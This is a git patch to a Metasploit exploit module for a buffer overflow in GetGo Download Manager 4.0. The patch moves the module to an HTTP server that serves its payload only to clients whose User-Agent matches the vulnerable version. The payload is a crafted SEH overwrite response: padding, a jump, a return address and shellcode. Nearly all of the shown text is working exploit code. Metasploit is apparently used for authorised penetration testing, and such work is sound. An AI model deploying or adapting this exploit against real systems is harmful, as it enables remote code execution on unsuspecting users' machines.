From ef0be946b1b56c14f51b1a93ad5c22931fc568b5 Mon Sep 17 00:00:00 2001
From: Gabor Seljan <sgabe@users.noreply.github.com>
Date: Thu, 15 Jan 2015 10:39:17 +0100
Subject: [PATCH] Use HttpServer instead of TcpServer

---
 .../browser/getgodm_http_response_bof.rb      | 27 ++++++++++++-------
 1 file changed, 17 insertions(+), 10 deletions(-)

diff --git a/modules/exploits/windows/browser/getgodm_http_response_bof.rb b/modules/exploits/windows/browser/getgodm_http_response_bof.rb
index 8285ffe68a..fba784441e 100644
--- a/modules/exploits/windows/browser/getgodm_http_response_bof.rb
+++ b/modules/exploits/windows/browser/getgodm_http_response_bof.rb
@@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::Remote::Seh
-  include Msf::Exploit::Remote::TcpServer
+  include Msf::Exploit::Remote::HttpServer
 
   def initialize(info = {})
     super(update_info(info,
@@ -59,21 +59,28 @@ class Metasploit3 < Msf::Exploit::Remote
       'DefaultTarget'  => 0))
   end
 
-  def on_client_connect(client)
+  def on_request_uri(cli, request)
 
-    sploit  = "HTTP/1.1 200 "
-    sploit << rand_text_alpha(target['Offset'])
+    print_status("Client connected...")
+
+    unless request['User-Agent'] =~ /GetGo Download Manager 4.0/
+      print_error("Sending 404 for unknown user-agent")
+      send_not_found(cli)
+      return
+    end
+
+    sploit  = rand_text_alpha(target['Offset'])
     sploit << "\x90\x90\xEB\x06"
     sploit << [target.ret].pack('V')
     sploit << payload.encoded
 
-    print_status("Sending #{sploit.length} bytes to #{client.peerhost}:#{client.peerport}...")
-    client.put(sploit)
+    print_status("Sending #{sploit.length} bytes to port #{cli.peerport}...")
 
-    sleep(3)
-    handler(client)
-    service.close_client(client)
+    resp = create_response(200, sploit)
+    resp.body = ""
+    cli.send_response(resp)
+
+    close_client(cli)
 
   end
-
 end